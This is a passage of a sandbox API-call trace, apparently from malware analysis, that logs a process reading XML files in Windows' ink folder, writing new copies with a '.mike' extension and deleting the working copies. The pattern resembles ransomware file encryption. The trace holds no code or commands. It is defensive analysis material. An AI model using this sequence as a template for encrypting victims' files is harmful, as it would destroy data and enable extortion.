[0044.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.091] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2255b98 | out: lpFileInformation=0x2255b98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47a2c60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe47a2c60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe47c8dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc30)) returned 1 [0044.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.091] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", dwFileAttributes=0x80) returned 0 [0044.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", lpFilePart=0x0) returned 0x42 [0044.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0044.092] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47a2c60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe47a2c60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe47c8dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc30)) returned 1 [0044.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0044.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpFilePart=0x0) returned 0x3d [0044.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike", lpFilePart=0x0) returned 0x42 [0044.093] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.mike")) returned 1 [0044.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0044.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0044.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0044.095] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.095] GetFileType (hFile=0x264) returned 0x1 [0044.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0044.095] GetFileType (hFile=0x264) returned 0x1 [0044.095] CloseHandle (hObject=0x264) returned 1 [0044.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0044.096] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0044.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0044.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.096] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), fInfoLevelId=0x0, lpFileInformation=0x2257af8 | out: lpFileInformation=0x2257af8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27dc6b13, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27dc6b13, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa24)) returned 1 [0044.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.096] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), fInfoLevelId=0x0, lpFileInformation=0x2257de8 | out: lpFileInformation=0x2257de8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27dc6b13, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27dc6b13, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa24)) returned 1 [0044.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.096] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.097] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", lpFilePart=0x0) returned 0x3d [0044.097] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", lpFilePart=0x0) returned 0x42 [0044.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0044.097] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0044.097] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", lpFilePart=0x0) returned 0x42 [0044.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0044.097] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.097] GetFileType (hFile=0x264) returned 0x1 [0044.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0044.097] GetFileType (hFile=0x264) returned 0x1 [0044.097] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0044.098] WriteFile (in: hFile=0x264, lpBuffer=0x2258b3c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2258b3c*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0044.098] CloseHandle (hObject=0x264) returned 1 [0044.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0044.099] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), fInfoLevelId=0x0, lpFileInformation=0x2258680 | out: lpFileInformation=0x2258680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27dc6b13, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27dc6b13, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa24)) returned 1 [0044.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0044.099] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", lpFilePart=0x0) returned 0x3d [0044.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0044.099] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.099] GetFileType (hFile=0x264) returned 0x1 [0044.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0044.099] GetFileType (hFile=0x264) returned 0x1 [0044.099] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0044.099] ReadFile (in: hFile=0x264, lpBuffer=0x2259c50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2259c50*, lpNumberOfBytesRead=0x2af0c8*=0xa24, lpOverlapped=0x0) returned 1 [0044.131] CloseHandle (hObject=0x264) returned 1 [0044.132] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", lpFilePart=0x0) returned 0x42 [0044.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0044.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.132] GetFileType (hFile=0x264) returned 0x1 [0044.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0044.132] GetFileType (hFile=0x264) returned 0x1 [0044.132] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0044.132] WriteFile (in: hFile=0x264, lpBuffer=0x22607e8*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x22607e8*, lpNumberOfBytesWritten=0x2af0bc*=0xa30, lpOverlapped=0x0) returned 1 [0044.132] CloseHandle (hObject=0x264) returned 1 [0044.133] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", lpFilePart=0x0) returned 0x42 [0044.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0044.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.133] GetFileType (hFile=0x264) returned 0x1 [0044.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0044.134] GetFileType (hFile=0x264) returned 0x1 [0044.134] WriteFile (in: hFile=0x264, lpBuffer=0x22639fc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x22639fc*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0044.135] CloseHandle (hObject=0x264) returned 1 [0044.136] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", lpFilePart=0x0) returned 0x3d [0044.136] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", lpFilePart=0x0) returned 0x42 [0044.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.136] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47c8dc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe47c8dc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe483b1e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc50)) returned 1 [0044.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.136] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", lpFilePart=0x0) returned 0x3d [0044.136] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", lpFilePart=0x0) returned 0x42 [0044.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.136] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22650ac | out: lpFileInformation=0x22650ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47c8dc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe47c8dc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe483b1e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc50)) returned 1 [0044.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.136] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", lpFilePart=0x0) returned 0x3d [0044.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", dwFileAttributes=0x80) returned 0 [0044.137] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", lpFilePart=0x0) returned 0x3d [0044.137] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", lpFilePart=0x0) returned 0x42 [0044.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0044.137] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47c8dc0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe47c8dc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe483b1e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc50)) returned 1 [0044.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0044.138] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", lpFilePart=0x0) returned 0x3d [0044.138] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike", lpFilePart=0x0) returned 0x42 [0044.138] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.mike")) returned 1 [0044.139] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.139] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.139] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0044.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0044.140] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0044.140] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.141] GetFileType (hFile=0x264) returned 0x1 [0044.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0044.141] GetFileType (hFile=0x264) returned 0x1 [0044.141] CloseHandle (hObject=0x264) returned 1 [0044.141] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.141] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.141] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0044.141] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0044.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0044.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.141] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), fInfoLevelId=0x0, lpFileInformation=0x226700c | out: lpFileInformation=0x226700c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27decc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27decc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d8)) returned 1 [0044.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.142] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.142] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), fInfoLevelId=0x0, lpFileInformation=0x22672fc | out: lpFileInformation=0x22672fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27decc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27decc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d8)) returned 1 [0044.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.142] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpFilePart=0x0) returned 0x3d [0044.142] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common 